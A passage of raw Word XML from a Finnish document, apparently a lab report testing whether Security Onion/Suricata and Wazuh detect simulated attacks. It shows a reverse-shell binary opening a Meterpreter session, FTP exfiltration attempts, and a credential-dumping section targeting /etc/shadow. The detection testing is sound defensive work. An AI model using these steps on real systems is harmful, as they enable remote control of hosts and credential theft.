          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>./reverse_shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="74029972" w14:textId="15BC84A0">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit luo istunnon (session 1) Kalille, kun ohjelma suoritetaan NS1:llä:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="672D5F12" w:rsidRDefault="52EB87D8" w14:paraId="22064E88" w14:textId="1C5DA7DD">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter session 1 opened (10.2.0.13:4444 -&gt; 10.4.0.10:43242)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="00B8650A" w:rsidRDefault="52EB87D8" w14:paraId="7C8CD27C" w14:textId="30DA46B3">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="672D5F12">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>meterpreter &gt;</w:t>
      </w:r>
      <w:r w:rsidR="00B8650A">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00DF54F5" w:rsidR="00DF54F5" w:rsidP="00DF54F5" w:rsidRDefault="00DF54F5" w14:paraId="1486B6E9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B8650A" w:rsidP="261F289F" w:rsidRDefault="005915C2" w14:paraId="14AA530A" w14:textId="302A928F">
      <w:pPr>
        <w:pStyle w:val="Normaali"/>
      </w:pPr>
      <w:r w:rsidR="005915C2">
        <w:rPr/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00B8650A">
        <w:rPr/>
        <w:t xml:space="preserve">ecurity </w:t>
      </w:r>
      <w:r w:rsidR="00B8650A">
        <w:rPr/>
        <w:t>onion</w:t>
      </w:r>
      <w:r w:rsidR="00B8650A">
        <w:rPr/>
        <w:t xml:space="preserve"> hälyttää tästä mahdollisena </w:t>
      </w:r>
      <w:r w:rsidR="00B8650A">
        <w:rPr/>
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidR="00B8650A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F16F50">
        <w:rPr/>
        <w:t>skannailuna</w:t>
      </w:r>
      <w:r w:rsidR="001771CE">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="66922D38">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Suricata näyttää huomaavan mahdollisesti scp yhteyden luomisen, mutta se ei huomaa itse reverse shelliä, joka kulkee portista tcp 4444.</w:t>
      </w:r>
      <w:r w:rsidR="66922D38">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001771CE">
        <w:rPr/>
        <w:t>(Kuvio 12)</w:t>
      </w:r>
      <w:r w:rsidR="00172236">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001771CE" w:rsidP="001771CE" w:rsidRDefault="00012CB6" w14:paraId="3648D34C" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00012CB6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45124191" wp14:editId="7B2DFE12">
            <wp:extent cx="6120130" cy="272415"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59656873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68734" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="272415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00B8650A" w:rsidR="00012CB6" w:rsidP="001771CE" w:rsidRDefault="001771CE" w14:paraId="0DA116AB" w14:textId="4E13A0FB">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971529" w:id="44"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B734BD">
        <w:t>Hälytys SSH-skannauksesta</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidRPr="00286C81" w:rsidR="000B394A" w:rsidP="008F0EE6" w:rsidRDefault="000B394A" w14:paraId="608FDDE2" w14:textId="37C9B317">
      <w:pPr>
        <w:pStyle w:val="Otsikko2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc38363321" w:id="1143215998"/>
      <w:r w:rsidR="000B394A">
        <w:rPr/>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1143215998"/>
    </w:p>
    <w:p w:rsidRPr="00CB1409" w:rsidR="000B394A" w:rsidP="008F0EE6" w:rsidRDefault="00CB1409" w14:paraId="5AB79ADF" w14:textId="0AED7E22">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1132707596" w:id="1832467669"/>
      <w:r w:rsidR="00CB1409">
        <w:rPr/>
        <w:t>FTP protokollan käyttö tiedon s</w:t>
      </w:r>
      <w:r w:rsidR="00CB1409">
        <w:rPr/>
        <w:t>iirtämisessä ulos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1832467669"/>
    </w:p>
    <w:p w:rsidRPr="00CB1409" w:rsidR="00CB1409" w:rsidP="009814E1" w:rsidRDefault="00CB1409" w14:paraId="7669717D" w14:textId="126CAFEB">
      <w:r w:rsidRPr="00CB1409">
        <w:t xml:space="preserve">Hyökkääjä </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1409" w:rsidR="00E3433A">
        <w:t>käyttää</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1409">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E3433A">
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidR="006F530A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E3433A">
        <w:t>(File transmission protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1409">
        <w:t xml:space="preserve"> protokollaa t</w:t>
      </w:r>
      <w:r>
        <w:t>iedon ulos sii</w:t>
      </w:r>
      <w:r w:rsidR="006F530A">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>tämiseksi ws</w:t>
      </w:r>
      <w:r w:rsidR="006F530A">
        <w:t>01: päätelaitteelta. (Kuvio 13)</w:t>
      </w:r>
      <w:r w:rsidR="005915C2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F530A" w:rsidP="006F530A" w:rsidRDefault="00733FB6" w14:paraId="443A46B7" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00733FB6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CE83F1B" wp14:editId="421F3E96">
            <wp:extent cx="6120130" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="127811033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0331" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="600075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00DD265B" w:rsidR="009814E1" w:rsidP="006F530A" w:rsidRDefault="006F530A" w14:paraId="07CF1B7F" w14:textId="62B40D47">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971530" w:id="47"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidR="005915C2">
        <w:t>FTP testi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB1409" w:rsidP="009814E1" w:rsidRDefault="00CB1409" w14:paraId="445922B4" w14:textId="0ECD9B5C">
      <w:r w:rsidR="00CB1409">
        <w:rPr/>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidR="006C4374">
        <w:rPr/>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00CB1409">
        <w:rPr/>
        <w:t>efender</w:t>
      </w:r>
      <w:r w:rsidR="00CB1409">
        <w:rPr/>
        <w:t xml:space="preserve"> torjuu nämä yritykset</w:t>
      </w:r>
      <w:r w:rsidR="00CB1409">
        <w:rPr/>
        <w:t xml:space="preserve"> mutta </w:t>
      </w:r>
      <w:r w:rsidR="005915C2">
        <w:rPr/>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00CB1409">
        <w:rPr/>
        <w:t>azuh</w:t>
      </w:r>
      <w:r w:rsidR="005915C2">
        <w:rPr/>
        <w:t>:n</w:t>
      </w:r>
      <w:r w:rsidR="00CB1409">
        <w:rPr/>
        <w:t xml:space="preserve"> monitoriin tulee hälytys </w:t>
      </w:r>
      <w:r w:rsidR="006F530A">
        <w:rPr/>
        <w:t>luvattomasta</w:t>
      </w:r>
      <w:r w:rsidR="00CB1409">
        <w:rPr/>
        <w:t xml:space="preserve"> komentojen </w:t>
      </w:r>
      <w:r w:rsidR="00694CC3">
        <w:rPr/>
        <w:t>suorittamisesta,</w:t>
      </w:r>
      <w:r w:rsidR="00CB1409">
        <w:rPr/>
        <w:t xml:space="preserve"> jotka </w:t>
      </w:r>
      <w:r w:rsidR="00DD265B">
        <w:rPr/>
        <w:t>estyvät</w:t>
      </w:r>
      <w:r w:rsidR="00CB1409">
        <w:rPr/>
        <w:t xml:space="preserve"> turvasyistä.</w:t>
      </w:r>
      <w:r w:rsidR="007E501E">
        <w:rPr/>
        <w:t xml:space="preserve"> (Kuvio 14)</w:t>
      </w:r>
      <w:r w:rsidR="005915C2">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34D31C85" w:rsidP="261F289F" w:rsidRDefault="34D31C85" w14:paraId="7AE091A9" w14:textId="4A31B6CA">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="34D31C85">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Wazuh voi huomata toiminnan näin:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34D31C85" w:rsidP="261F289F" w:rsidRDefault="34D31C85" w14:paraId="379F1E53" w14:textId="0DC29785">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="34D31C85">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tiedostojen valvonta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34D31C85" w:rsidP="261F289F" w:rsidRDefault="34D31C85" w14:paraId="036FB9CC" w14:textId="353D3BB4">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="34D31C85">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Wazuh valvoo tiedostojen muutoksia ja siirtoja. Jos hyökkääjä käyttää FTP:tä tiedostojen siirtämiseen, se tunnistaa tiedostojen luomisen, muokkaamisen tai siirron luvattomilla tavoilla. Se voi myös nähdä, onko tiedostoja siirretty ulkopuolelle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34D31C85" w:rsidP="261F289F" w:rsidRDefault="34D31C85" w14:paraId="24690FB4" w14:textId="4587844F">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="34D31C85">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Lokien valvonta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34D31C85" w:rsidP="261F289F" w:rsidRDefault="34D31C85" w14:paraId="269718E2" w14:textId="0D87ACA7">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="34D31C85">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Järjestelmän ja sovelluksen lokit ovat tarkkailussa jatkuvasti. Wazuh analysoi epäilyttävät komennot ja käyttäjän toiminnan, tässä FTP-komentojen suorittamisen, ja hälyttää tapahtumista, jotka ovat mahdollisesti vaarallisia.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34D31C85" w:rsidP="261F289F" w:rsidRDefault="34D31C85" w14:paraId="707F9472" w14:textId="4C202128">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="34D31C85">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Esimerkiksi, jos FTP-komentoja käytetään, mutta niitä ei ole odotettu tavanomaisessa järjestelmätoiminnassa, Wazuh havaitsee tämän, ja varoitukset tulevat näkyviin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34D31C85" w:rsidP="261F289F" w:rsidRDefault="34D31C85" w14:paraId="64014043" w14:textId="7C7F5432">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="34D31C85">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Detecting data theft with </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="34D31C85">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="34D31C85">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the open-source XDR. 2023.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E501E" w:rsidP="007E501E" w:rsidRDefault="00694CC3" w14:paraId="4FC95DB4" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00694CC3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FCED1DA" wp14:editId="072F87A9">
            <wp:extent cx="6120130" cy="1306195"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="787256040" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontt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040" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, viiva&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1306195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF7EE1" w:rsidP="008F0EE6" w:rsidRDefault="007E501E" w14:paraId="7A59BD1C" w14:textId="27713656">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971531" w:id="48"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidR="008F0EE6">
        <w:t>Epäonnistunut yritys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D4C91" w:rsidP="00C47CED" w:rsidRDefault="00BF7EE1" w14:paraId="799C2E7F" w14:textId="7A0309D0">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc2005223858" w:id="614543996"/>
      <w:r w:rsidR="00BF7EE1">
        <w:rPr/>
        <w:t>Tunnistetietojen dumppaus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="614543996"/>
    </w:p>
    <w:p w:rsidR="00BF7EE1" w:rsidP="00BF7EE1" w:rsidRDefault="00DD265B" w14:paraId="69BA2268" w14:textId="39D2F6A3">
      <w:r w:rsidR="00DD265B">
        <w:rPr/>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="47101BA8">
        <w:rPr/>
        <w:t xml:space="preserve"> järjestelmästä löytyy tiedosto /</w:t>
      </w:r>
      <w:r w:rsidR="47101BA8">
        <w:rPr/>
        <w:t>etc</w:t>
      </w:r>
      <w:r w:rsidR="47101BA8">
        <w:rPr/>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="47101BA8">
        <w:rPr/>
        <w:t>shadow</w:t>
      </w:r>
      <w:r w:rsidR="47101BA8">
        <w:rPr/>
        <w:t xml:space="preserve"> joka sisältää kirjautumistietoja, joten on </w:t>
      </w:r>
      <w:r w:rsidR="47101BA8">
        <w:rPr/>
        <w:t>luonnollista</w:t>
      </w:r>
      <w:r w:rsidR="05B4587C">
        <w:rPr/>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="47101BA8">
        <w:rPr/>
        <w:t xml:space="preserve"> että hyökkääjä on kiinnostunut näistä tiedoista. Simuloidaan </w:t>
      </w:r>
      <w:r w:rsidR="00DD265B">
        <w:rPr/>
        <w:t>seuraavaksi tilannetta,</w:t>
      </w:r>
      <w:r w:rsidR="47101BA8">
        <w:rPr/>
        <w:t xml:space="preserve"> jos</w:t>
      </w:r>
      <w:r w:rsidR="00DD265B">
        <w:rPr/>
        <w:t>sa</w:t>
      </w:r>
      <w:r w:rsidR="47101BA8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="47101BA8">
        <w:rPr/>
        <w:t>shadow</w:t>
      </w:r>
      <w:r w:rsidR="47101BA8">
        <w:rPr/>
        <w:t xml:space="preserve"> tiedoston sisältöä käsitellään.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00563D9A" w:rsidP="00BF7EE1" w:rsidRDefault="00C47CED" w14:paraId="3EBA1D1D" w14:textId="6856AA0B">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="000C6495">
        <w:t>jetaan www palvelimella</w:t>
      </w:r>
      <w:r w:rsidR="00DD265B">
        <w:t xml:space="preserve"> kuvion 15</w:t>
      </w:r>
      <w:r w:rsidR="000C6495">
        <w:t xml:space="preserve"> komennot</w:t>
      </w:r>
      <w:r w:rsidR="00DF54F5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD265B" w:rsidP="00DD265B" w:rsidRDefault="00563D9A" w14:paraId="5847A36F" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00563D9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D2B8EB6" wp14:editId="3B0EBF8C">
            <wp:extent cx="4410691" cy="285790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="166416551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65517" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
